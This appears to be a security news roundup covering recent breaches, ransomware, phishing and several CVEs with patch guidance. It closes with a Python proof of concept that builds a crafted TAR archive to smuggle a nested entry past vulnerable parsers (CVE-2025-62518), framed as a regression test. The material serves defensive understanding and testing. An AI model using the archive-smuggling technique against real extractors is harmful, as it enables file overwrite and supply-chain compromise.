A concise roundup of notable incidents and high-risk exposures.
Top attacks and breaches
- Toys “R” Us Canada — customer data leaked. A breach exposed customer names, postal addresses, email addresses and phone numbers. Passwords and payment data were not reported compromised.
  Source: www.bitdefender.com/en-us/blo…
- Askul (Japan) — ransomware halts online operations. Ransomware forced Askul to suspend online ordering, registrations and shipments across its e-commerce sites, disrupting logistics for the retailers it serves, including Muji and Sogo & Seibu.
  Source: www.theregister.com/2025/10/2…
- Verisure / Alert Alarm (Sweden) — third-party system breach. Unauthorized access to systems operated by an external billing partner exposed names, addresses, email addresses and Swedish personal identity numbers (personnummer, commonly translated as social-security numbers) for roughly 35,000 current and former Alert Alarm customers.
  Source: www.verisure.com/press-rel…
- Jewett-Cameron (Oregon) — ransomware and data theft. Attackers encrypted parts of the company's internal systems and stole video-meeting images, non-public financial documents and IT information. Operations were materially impacted.
  Source: www.securityweek.com/fencing-a…
- LastPass — targeted phishing campaign steals ~$4.4M in crypto. Phishing emails built around a fake inheritance (legacy-access) workflow sent users to spoofed LastPass pages that harvested master passwords and passkeys, leading to vault compromise and cryptocurrency theft. The activity is attributed to CryptoChameleon (UNC5356). The lure only works if the user types the master password into the look-alike site; no legitimate LastPass process asks for it by email.
  Source: www.techradar.com/pro/secur…
- Lazarus / “DreamJob” — UAV/drone defence sector targeted. Lazarus used fake job-offer lures and trojanized open-source projects hosted on GitHub to deploy the ScoringMathTea RAT, enabling theft of proprietary UAV designs and manufacturing know-how.
  Source: www.eset.com/us/about/…
Vulnerabilities and patches
- CVE-2025-33073 — Windows SMB Client EoP. Patched in the June 2025 update cycle. The bug is an NTLM reflection flaw: an attacker coerces the target host into authenticating to an attacker-controlled SMB server and reflects that authentication back to the target's own SMB service, gaining SYSTEM-level code execution on it. The reflection only succeeds where SMB signing is not required, so alongside the patch verify that signing is required (RequireSecuritySignature, as shown by Get-SmbServerConfiguration), not merely enabled.
  Microsoft: msrc.microsoft.com/update-gu…
  NVD: nvd.nist.gov/vuln/deta…
- CVE-2025-59287 — Windows Server Update Services (WSUS) RCE. Deserialization of untrusted data in WSUS allows unauthenticated remote code execution on any server with the WSUS role enabled (CVSS 9.8). The fix shipped in the October 2025 Patch Tuesday cycle was incomplete; Microsoft issued an out-of-band update on Oct. 23 2025 after exploitation was observed. Servers without the WSUS role are not affected; for hosts that cannot update immediately, Microsoft's workaround is to disable the role or block inbound TCP 8530/8531 at the host firewall.
  Details: www.cisa.gov/news-even…
- CVE-2025-54236 — “SessionReaper” (Adobe Commerce / Magento). Actively exploited. An improper-input-validation flaw in the Commerce REST API lets an unauthenticated attacker hijack customer sessions; in observed attacks it is used to drop PHP webshells. Adobe published a hotfix in September 2025, but a large portion of stores remain unpatched.
  Adobe: helpx.adobe.com/security/…
- CVE-2025-62518 — async-tar / tokio-tar (Rust), “TARmageddon”. A TAR desynchronization flaw: when a PAX extended header declares an entry's size but the ustar header says 0, the affected parsers advance by the ustar value, so the entry's body is parsed as the next header. An attacker who places a nested archive in that body gets its entries extracted as if they were top-level, enabling file overwrite during extraction and creating broad supply-chain exposure through transitive dependencies. The maintained fork astral-tokio-tar is patched; the original async-tar and tokio-tar crates are unmaintained and remain in circulation.
  NVD: nvd.nist.gov/vuln/deta…
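The PAX/ustar size desynchronization behind CVE-2025-62518, reproduced on a constructed archive as an added example; this is not code from the affected crates, from the fix, or from the advisory. A naive walker that skips entry bodies by the ustar size surfaces the smuggled nested entry, a walker that honors the PAX size record does not, and Python's standard-library tarfile is run over the same bytes for comparison. The entry names (benign.txt, etc/evil.conf) and the payload bytes are constructed for illustration.

```python
"""Reproduce the PAX/ustar size desynchronization class of CVE-2025-62518
on a constructed archive, with a naive walker beside a correct one."""
import io
import tarfile

BLOCK = 512


def round_up(n: int) -> int:
    """TAR bodies are padded to whole 512-byte blocks."""
    return (n + BLOCK - 1) // BLOCK * BLOCK


def ustar_header(name: str, size: int, typeflag: str) -> bytes:
    """Build a minimal ustar header block with a valid checksum."""
    h = bytearray(BLOCK)
    h[0:len(name)] = name.encode()
    h[100:108] = b"0000644\0"          # mode
    h[108:116] = b"0000000\0"          # uid
    h[116:124] = b"0000000\0"          # gid
    h[124:136] = f"{size:011o}\0".encode()
    h[136:148] = b"00000000000\0"      # mtime
    h[148:156] = b" " * 8              # checksum field counts as spaces
    h[156] = ord(typeflag)
    h[257:263] = b"ustar\0"
    h[263:265] = b"00"
    h[148:156] = f"{sum(h):06o}\0 ".encode()
    return bytes(h)


def pax_size_record(size: int) -> bytes:
    """One PAX record: '<total length> size=<n>\\n', length counted inclusively."""
    body = f" size={size}\n"
    length = len(body) + 1
    while len(str(length)) + len(body) != length:
        length += 1
    return f"{length}{body}".encode()


def pax_records(body: bytes) -> dict:
    """Parse PAX '<length> key=value\\n' records into a dict."""
    records, pos = {}, 0
    while pos < len(body) and body[pos:pos + 1].isdigit():
        space = body.index(b" ", pos)
        length = int(body[pos:space])
        key, _, value = body[space + 1:pos + length - 1].partition(b"=")
        records[key.decode()] = value.decode()
        pos += length
    return records


def build_smuggling_archive():
    """Outer archive: PAX header (true size) + ustar header (size 0) + inner archive as body."""
    payload = b"# constructed sample: attacker-controlled config\n"  # constructed data
    inner = (ustar_header("etc/evil.conf", len(payload), "0")
             + payload.ljust(round_up(len(payload)), b"\0"))
    record = pax_size_record(len(inner))
    outer = (ustar_header("PaxHeaders/benign.txt", len(record), "x")
             + record.ljust(round_up(len(record)), b"\0")
             + ustar_header("benign.txt", 0, "0")   # ustar size field lies: 0
             + inner                                # the real body of benign.txt
             + b"\0" * (2 * BLOCK))                 # end-of-archive marker
    return outer, inner


def walk_entries(archive: bytes, honor_pax_size: bool):
    """Return (name, skip size) per entry. honor_pax_size=False reproduces the
    vulnerable behaviour: the body is skipped by the ustar size even though a
    PAX 'size' record overrides it, so the body's bytes are parsed as headers."""
    entries, pax_size, pos = [], None, 0
    while pos + BLOCK <= len(archive):
        header = archive[pos:pos + BLOCK]
        if header == b"\0" * BLOCK:                  # end-of-archive marker
            break
        name = header[0:100].split(b"\0", 1)[0].decode()
        ustar_size = int(header[124:136].split(b"\0", 1)[0].decode().strip() or "0", 8)
        typeflag = chr(header[156])
        pos += BLOCK
        if typeflag == "x":                          # PAX extended header
            recs = pax_records(archive[pos:pos + ustar_size])
            pax_size = int(recs["size"]) if "size" in recs else None
            pos += round_up(ustar_size)
            continue
        size = pax_size if (honor_pax_size and pax_size is not None) else ustar_size
        pax_size = None
        entries.append((name, size))
        pos += round_up(size)
    return entries


def stdlib_names(archive: bytes):
    """Python's tarfile honors the PAX size, so the nested entry never surfaces."""
    with tarfile.open(fileobj=io.BytesIO(archive)) as tf:
        return tf.getnames()


if __name__ == "__main__":
    outer, inner = build_smuggling_archive()
    print("vulnerable walk:", walk_entries(outer, honor_pax_size=False))
    print("correct walk:   ", walk_entries(outer, honor_pax_size=True))
    print("stdlib tarfile: ", stdlib_names(outer))
```

The vulnerable walk lists etc/evil.conf as a top-level entry even though it exists only inside benign.txt's body; an extractor driven by that walk writes it to disk. The same property makes a useful regression test for any tar implementation in a dependency tree: feed it an archive whose ustar size and PAX size disagree and confirm only the outer entry is reported.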